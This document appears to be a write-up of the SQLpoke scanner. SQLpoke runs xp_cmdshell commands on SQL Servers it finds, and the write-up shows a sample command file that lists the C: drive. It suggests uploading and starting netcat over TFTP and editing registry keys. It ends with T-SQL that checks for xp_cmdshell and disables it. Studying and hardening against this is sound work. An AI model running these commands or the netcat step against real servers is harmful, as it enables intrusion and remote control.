SQLpoke
Execution:
sqlpoke [Start IP] [End IP] [Port] [Command File]
Note:- No more than 32 Commands allowed in the command file.
Expected Output:
C:\sqlpoke\Release>SQLPOKE 200.100.100.175 200.100.100.175 1433 commands.txt
Scan complete.
C:\sqlpoke\Release>
Note: - commands.txt contains the single line:
xp_cmdshell 'dir c:\ > c:\ip.txt'
Extra Note: - You must have valid SQL Server credentials for this to work, and the login you use must be permitted to run xp_cmdshell (by default only members of the sysadmin role are)!
The command passed to the SQL server should have written a directory listing of the C:\ drive to a file called ip.txt, using the dangerous extended stored procedure xp_cmdshell, which it did, as shown below:
Volume in drive C has no label.
Volume Serial Number is DC22-D212
Directory of c:\
07/21/06 09:57a 0 AUTOEXEC.BAT
07/21/06 09:57a 0 CONFIG.SYS
07/21/06 09:23a <DIR> MSSQL7
07/21/06 10:38a 180,355,072 pagefile.sys
07/21/06 09:13a <DIR> Program Files
07/21/06 09:24a <DIR> TEMP
07/21/06 10:45a <DIR> WINNT
8 File(s) 180,355,072 bytes
1,654,722,048 bytes free
The beauty of this is that the same mechanism can be used to, say, open a TFTP session to a remote machine and upload netcat and start it listening, overwrite files, or read the registry and change registry keys (via xp_regread / xp_regwrite), depending on which built-in SQL Server extended stored procedures are enabled on the system.
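As an added example, not part of the original SQLpoke write-up, the T-SQL a practitioner would run to see what SQLpoke's command file actually executes and to check and close the xp_cmdshell exposure the tool relies on. It assumes SQL Server 2005 or later, where xp_cmdshell is governed by sp_configure; on SQL Server 7.0 / 2000 (the MSSQL7 install in the listing above) the procedure was enabled by default and the usual hardening was to revoke EXECUTE on it or drop it outright.

```sql
-- Added example (assumes SQL Server 2005 or later); not SQLpoke's own code.

-- 1. What the command file runs. xp_cmdshell returns the command's output
--    as a result set (one row per line), so the redirect to c:\ip.txt in the
--    write-up is only needed when the client does not display result sets.
EXEC master..xp_cmdshell 'dir c:\';

-- 2. Check: is xp_cmdshell enabled on this instance? value_in_use = 1 means yes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 3. Caveat from the write-up: credentials alone are not enough. Only members of
--    the sysadmin role can call xp_cmdshell directly; other logins need a proxy
--    account (sp_xp_cmdshell_proxy_account) to be configured by an admin.
SELECT SUSER_SNAME()              AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1 = can run xp_cmdshell

-- 4. Weak setting (what SQLpoke needs to find):
--    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
--    Hardened setting: turn it off and confirm it took effect.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';   -- expect value_in_use = 0
```

Run section 2 against each SQL Server found by a scan like SQLpoke's before anything else: an instance that answers on 1433 with xp_cmdshell enabled and a sysadmin login that can be guessed or reused is exactly the condition the tool exploits, and section 4 is the one-line fix.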